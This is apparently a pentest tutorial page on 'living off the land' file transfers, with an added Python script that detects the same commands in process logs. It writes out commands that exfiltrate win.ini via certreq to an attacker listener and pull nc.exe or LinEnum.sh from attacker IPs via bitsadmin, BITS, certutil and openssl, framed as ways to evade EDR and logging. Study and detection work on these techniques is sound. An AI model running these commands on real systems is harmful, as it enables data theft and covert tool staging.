# Upload and Download with Built-in OS Tools

***

### 🥾 **Living off the Land (LOTL)** – File Transfers without Dropping Tools

🧠 The term **"Living off the Land"** was coined by @obscuresec & @mattifestation and refers to **leveraging built-in binaries** on Windows and Linux to perform tasks like:

* 📤 Uploads
* 📥 Downloads
* ⚙️ Execution
* 📖 File access
* 🔐 Bypasses

💡 This stealthy technique reduces the need for external tools — which helps **evade EDRs, AVs, and logging** solutions.

***

### 🧰 Toolkits to Know

#### 🪟 Windows – [**LOLBAS**](https://lolbas-project.github.io/)

> A catalog of **Living off the Land Binaries And Scripts** for Windows.

#### 🐧 Linux – [**GTFOBins**](https://gtfobins.github.io/)

> A curated list of Unix binaries that can be abused by attackers or red teamers.

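Both sites have a search box that accepts function filters (LOLBAS uses a `/` prefix, GTFOBins a `+` prefix), for example: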

* `/download`
* `/upload`
* `+file read`
* `+file write`

***

### 🔁 Windows: Upload Using `certreq.exe` (LOLBAS)

From the **target system**:

```cmd
certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
```

This sends `win.ini` to our attack server. We catch it with:

```bash
sudo nc -lvnp 8000
```

📝 The file arrives as the body of an HTTP POST request; copy-paste its contents from the netcat listener output.

⚠️ **Heads-up**: Some versions of `certreq.exe` do **not** support the `-Post` parameter. Use an updated version if needed.

***

### 📥 Linux: Download Using OpenSSL (GTFOBins)

#### 🛠️ Step 1: On Attacker (Start SSL Server)

```bash
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
```

#### 📥 Step 2: On Target (Download File)

```bash
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
```

✅ The file is received over an encrypted SSL/TLS connection, with no need for a web server or `wget`/`curl`.

***

### 🧱 Other Powerful LOTL Tools

#### 🛰️ **Bitsadmin** (Windows)

{% code overflow="wrap" %}

```powershell
bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\Public\nc.exe
```

{% endcode %}

> Transfers files silently using **BITS** (Background Intelligent Transfer Service), which mimics legit system update behavior.

***

#### 🌀 **PowerShell BITS Transfer**

{% code overflow="wrap" %}

```powershell
Import-Module bitstransfer
Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```

{% endcode %}

> More advanced, supports proxies and credentials 🕵️‍♂️

***

#### 🔐 **Certutil.exe**

```cmd
certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
```

> Originally used for certs… now a de facto `wget` for red teamers.

⚠️ **AMSI may flag this!** Useful in **lab environments or bypass testing.**

***
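
🔎 From the defender's side, every command on this page leaves a recognisable process command line. The Python below is an added example (not part of the original notes): it matches those command shapes in process-creation events and extracts the remote endpoint for pivoting. The event dictionaries, host names and rule names are constructed for illustration; the command line itself would come from a source such as Sysmon Event ID 1 or Security event 4688.

```python
import re

# Remote URL argument; stops at whitespace or a quote (\x22 is the double quote).
URL = r"(?P<remote>https?://[^\s'\x22]+)"

# One rule per command shape shown on this page. Rule names are made up here.
RULES = [
    ("certreq_post_upload", rf"\bcertreq(\.exe)?\b.*\s-post\b.*{URL}"),
    ("bitsadmin_transfer", rf"\bbitsadmin(\.exe)?\b.*\s/transfer\b.*{URL}"),
    ("ps_start_bitstransfer", rf"\bstart-bitstransfer\b.*-source\s+['\x22]?{URL}"),
    ("certutil_remote_url", rf"\bcertutil(\.exe)?\b.*{URL}"),
    ("openssl_s_client", r"\bopenssl(\.exe)?\s+s_client\b.*-connect\s+(?P<remote>[\w.\-]+:\d+)"),
]
# Case-insensitive: Windows accepts any casing for binary names and switches.
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def detect(events):
    """Return one finding (host, rule, remote endpoint) per matching event."""
    findings = []
    for ev in events:
        for name, rx in COMPILED:
            m = rx.search(ev["command_line"])
            if m:
                findings.append({"host": ev["host"], "rule": name, "remote": m.group("remote")})
                break  # first matching rule wins
    return findings


# Constructed sample events: the page's commands mixed with benign uses of the same binaries.
SAMPLE_EVENTS = [
    {"host": "ws01", "command_line": r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini"},
    {"host": "ws01", "command_line": r"certreq.exe -new request.inf request.req"},
    {"host": "ws02", "command_line": r"bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\Public\nc.exe"},
    {"host": "ws02", "command_line": r'Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"'},
    {"host": "ws03", "command_line": r"certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe"},
    {"host": "ws03", "command_line": r"certutil.exe -hashfile C:\Temp\setup.exe SHA256"},
    {"host": "lnx01", "command_line": "openssl s_client -connect 10.10.10.32:80 -quiet"},
    {"host": "lnx01", "command_line": "openssl x509 -in certificate.pem -noout -text"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['rule']:22} {f['remote']}")
```

Matching on the command line alone misses renamed copies of these binaries, so pair it with the binary's original file name where the log source records it.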
